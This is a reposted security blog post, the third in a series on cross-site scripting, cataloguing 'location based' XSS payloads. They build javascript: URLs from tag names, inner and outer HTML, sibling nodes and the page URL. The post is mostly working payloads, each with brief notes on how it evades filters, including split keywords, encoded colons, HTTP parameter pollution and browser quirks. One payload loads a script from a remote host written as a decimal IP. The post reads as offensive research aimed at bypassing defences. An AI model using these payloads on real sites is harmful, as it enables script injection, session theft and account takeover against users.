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  • 【XSS技巧拓展】————21、Location Based Payloads – Part III

    We will move now to a simple taxonomy of our location based payloads with some examples. Each payload will be followed by its respective result and some comment on it.

    It’s important to note that all what we do with the javascript pseudo protocol (javascript:) can be applied to the data (data:) one as well (probably with some particularities) and may appear on future posts. But the best way to stay tuned to the research and development of the most awesome XSS vectors/payloads is following my private twitter account, @brutalsecrets.

    We have 3 similar methods to use location, based on the destination of this very useful property:

    – Location

    – Location Self

    – Location Self Plus

    We will also make use of a scheme based on position similar to our “XSS Payload Scheme” to help us understand how the payload is constructed and to find an alternative to the property used. The injection is formed by some of these parts, with the tag being the reference:

    before < [itself [inside]] > after # hash

    Before: everything before the tag.

    Itself: anything that uses the tag name.

    Inside: any attribute inside the tag.

    After: everything after the tag until hash.

    Hash: everything after the # sign.

    So, here we go.

    1) Location

    These are the regular payloads we’ve seen so far, using the javascript pseudo protocol to execute the code with some new tricks.

    1.1) Location Itself+After+Hash (tagName+innerHTML+location.hash)

    <javascript οnclick=location=tagName%2binnerHTML%2blocation.hash>:/*click me!#*/alert(9)

    <javascript οnclick=location=tagName%2binnerHTML%2blocation.hash>:’click me!#’-alert(9)

    The ones from the previous post, just placed in our current classification context.

    1.2) Location Itself+Hash (tagName+URL)

    <javascript: οnclick=location=tagName%2bURL>click me!#%0Aalert(1)

    javascript: + http://domain/page?p=<javascript: οnclick=location=tagName%2bURL>click me!#%0Aalert(1)

    Here we made use of “http:” as a label (label: code) and comment all that line with “//”. The alert is triggered because we jump to a new line with %0A.

    <javascript:”-‘ οnclick=location=tagName%2bURL>click me!#’-alert(1)

    javascript:”-‘ + http://domain/page?p=<javascript:”-‘ οnclick=location=tagName%2bURL>click me!#’-alert(1)

    Here we “stringfied” and “concatenated” (see first post) twice using double and single quotes, respectively.

    1.3) Location After+Hash (innerHTML+URL)

    <j οnclick=location=innerHTML%2bURL>javascript:”-‘click me!</j>#’-alert(1)

    javascript:”-‘click me! + http://domain/page?p=<j οnclick=location=innerHTML%2bURL>javascript:”-‘click me!</j>#’-alert(1)

    The “stringfied concatenation” again, avoiding placing javascript pseudo protocol in the tag.

    <j οnclick=location=innerHTML%2bURL>javascript:</j>#%0Aalert(1)

    javascript: + http://domain/page?p=<j οnclick=location=innerHTML%2bURL>javascript:</j>#%0Aalert(1)

    The same, using the “labeled jump” again.

    1.4) Location Itself+After+Hash (tagName+innerHTML+URL)

    <javas οnclick=location=tagName%2binnerHTML%2bURL>cript:”-‘click me!</javas>#’-alert(1)

    javas + cript:”-‘click me! + http://domain/page?p=%3Cjavas%20οnclick=location=tagName%2binnerHTML%2bURL%3Ecript:”-‘click me!</javas>#’-alert(1)

    <javas οnclick=location=tagName%2binnerHTML%2bURL>cript:</javas>#%0Aalert(1)

    javas + cript: + http://domain/page?p=<javas οnclick=location=tagName%2binnerHTML%2bURL>cript:</javas>#%0Aalert(1)

    Our well known tricks, this time splitting the “javascript:” string.

    1.5) Location Itself+Before (tagName+previous.Sibling)

    “-alert(1)<javascript:” οnclick=location=tagName%2bpreviousSibling.nodeValue>click me!

    javascript:” + “-alert(1)

    Just that simple.

    1.6) Location Itself+After+Before (tagName+innerHTML+previous.Sibling)

    “-alert(1)<javas οnclick=location=tagName%2binnerHTML%2bpreviousSibling.nodeValue>cript:”click me!

    javas + cript:” + “-alert(1)

    As before, but better obfuscated.

    1.7) Location After+Itself (innerHTML+outerHTML)

    <alert(1)<!– οnclick=location=innerHTML%2bouterHTML>javascript:1/*click me!*/</alert(1)<!–>

    javascript:1/*click me!*/ + <alert(1)<!– οnclick=location=innerHTML%2bouterHTML>

    We “concatenated” the number 1 with “alert(1)” using the greater than sign (<) of the tag and commented the rest.

    <j 1=”*/””-alert(1)<!– οnclick=location=innerHTML%2bouterHTML>javascript:/*click me!

    javascript:/* + <j 1=”*/””-alert(1)<!– οnclick=location=innerHTML%2bouterHTML>

    Here we just used the known double quotes method (the slash inside the tag needs to be encapsulated). This does not work in Internet Explorer because of the <!–.

    1.8) Location After+Before+Itself (innerHTML+previousSibling+outerHTML)

    */”<j”-alert(1)<!– οnclick=location=innerHTML%2bpreviousSibling.nodeValue%2bouterHTML>javascript:/*click me!

    javascript:/*click me! + */” + <x”-alert(9)<!– οnclick=location=innerHTML%2bpreviousSibling.nodeValue%2bouterHTML>

    As above, this doesn’t work in Internet Explorer because of the <!–.

    */”<j 1=-alert(9)// οnclick=location=innerHTML%2bpreviousSibling.nodeValue%2bouterHTML>javascript:/*click me!

    javascript:/*click me! + */” + <x 1=” -alert(9)//” οnclick=location=innerHTML%2bpreviousSibling.nodeValue%2bouterHTML>

    Browsers add a “” to the value of “1” and “onclick” attributes to normalize them. IE changes the order of the attributes, so it also doesn’t work there.

    1.9) Location After (innerHTML)

    <j οnclick=location=innerHTML>javascript%26colon;alert(1)//


    It seems simple, but some filters may be tricked by the encoded colon and the position of the “javascript” and “alert” signatures.

    1.10) Location Inside (name+id)

    <iframe id=t:alert(1) name=javascrip οnlοad=location=name%2bid>

    javascrip + t:alert(1)

    Back to the good and old basics.

    2) Location Self

    These payloads use the current page as location, but injecting a new vector/payload on it. So they only work for reflected XSS and the final result will be another request to the server. About the same previous tricks can be used (with few exceptions regarding encoding), so we will just see some examples of the mechanics using “p” as the vulnerable parameter.

    2.1) Location Self Inside

    <svg id=?p=<svg/οnlοad=alert(1)%2B οnlοad=location=id>


    <svg id=?p=<script/src=//3237054390/1%2B οnlοad=location=id>


    2.2) Location Self After

    <j οnclick=location=textContent>?p=%26lt;svg/οnlοad=alert(1)>


    3) Location Self Plus

    Same as “Location Self”, but using HPP (HTTP Parameter Pollution) technique, adding the same vulnerable parameter to the current page. The extra parameter is the one that will trigger the payload. Useful to avoid a “location=” filter signature.

    3.1) Location Self Plus Itself

    <j%26p=<svg%2Bοnlοad=alert(1) οnclick=location%2B=outerHTML>click me!

    http://domain/page?p=%3Cj%26p=%3Csvg%2Bοnlοad=alert(1)%20οnclick=location%2B=outerHTML%3Eclick%20me!<j&p=<svg+οnlοad=alert(1) οnclick=“location+=outerHTML”>

    3.2) Location Self Plus After

    <j οnclick=location%2B=textContent>%26p=%26lt;svg/οnlοad=alert(1)>


    3.3) Location Self Plus Before

    %26p=%26lt;svg/οnlοad=alert(1)><j οnclick=location%2B=document.body.textContent>click me!

    http://domain/page?p=%26p=%26lt;svg/οnlοad=alert(1)%3E%3Cj%20οnclick=location%2B=document.body.textContent%3Eclick%20me![BODY_CONTENT]&p=<svg/οnlοad=alert(1)>click me!

    As you may have noticed, there will be tons of combinations. So in the final post we will take a look at the places in an URL (with the injection) of all the properties we can use to build location based payloads.


    总会有不期而遇的温暖. 和生生不息的希望。
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  • 原文地址:https://www.cnblogs.com/devi1/p/13486395.html
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